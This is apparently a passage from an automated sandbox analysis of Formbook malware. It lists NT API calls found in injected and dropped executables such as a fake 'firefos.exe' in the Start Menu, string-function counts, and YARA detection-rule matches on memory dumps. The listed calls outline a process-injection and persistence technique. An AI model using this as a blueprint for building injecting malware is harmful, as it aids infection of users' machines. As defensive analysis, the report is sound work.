          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_001381C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00138270 NtReadFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_001382F0 NtClose,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_001383A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_001381BB NtCreateFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0013826B NtReadFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_001382EA NtClose,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0013839D NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B632E NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B6332 NtCreateSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B67C2 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004181C0 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00418270 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004182F0 NtClose,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004181BB NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041826B NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004182EA NtClose,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041839D NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009410D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009400C4 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940048 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940078 NtResumeThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009401D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00941148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F900 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00941930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FBB8 NtQueryInformationToken,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC90 NtUnmapViewOfSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC60 NtMapViewOfSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00941D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FD8C NtDelayExecution,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FEA0 NtReadVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FFB4 NtCreateSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B00C4 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B10D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0048 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0078 NtResumeThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B01D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B1148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF900 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B1930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFBB8 NtQueryInformationToken,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC90 NtUnmapViewOfSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC60 NtMapViewOfSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFD8C NtDelayExecution,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B1D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFEA0 NtReadVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFFB4 NtCreateSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0096EE4C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00960F3F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0097DF7C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008BE0C6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008ED005
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008C3040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008D905A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008BE2E9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_00961238
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_009663BF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008BF3CF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008E63DB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008C2305
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008C7353
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_0090A37B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008D1489
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008F5485
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008FD47D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008DC5F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008C351F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_00906540
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008C4680
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008CE6C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_0090A634
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_00962622
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_0094579A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008CC7BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008F57C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_0095F8EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008CC85C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008E286D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_0096098E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008C29B2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008D69FE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_00945955
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_00973A83
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_0096CBA4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_0094DBDA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008BFBD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008E7B00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_0095FDDD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008F0D3B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008CCD5B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008F2E2F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008DEE4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_0095CFB1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008D0F3F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008EDF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 0214DF5C appears 123 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 0214E2A8 appears 38 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 021BF970 appears 84 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 0219373B appears 245 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 02193F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: String function: 008BDF5C appears 119 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: String function: 0090373B appears 238 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: String function: 00993F92 appears 108 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: String function: 0092F970 appears 81 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: String function: 00903F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: String function: 0099373B appears 238 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: String function: 009BF970 appears 81 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: String function: 0094E2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: String function: 008BE2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: String function: 0094DF5C appears 118 times
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: String function: 00993F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: String function: 0099373B appears 248 times
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: String function: 009BF970 appears 84 times
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: String function: 0094E2A8 appears 60 times
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: String function: 0094DF5C appears 130 times
Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
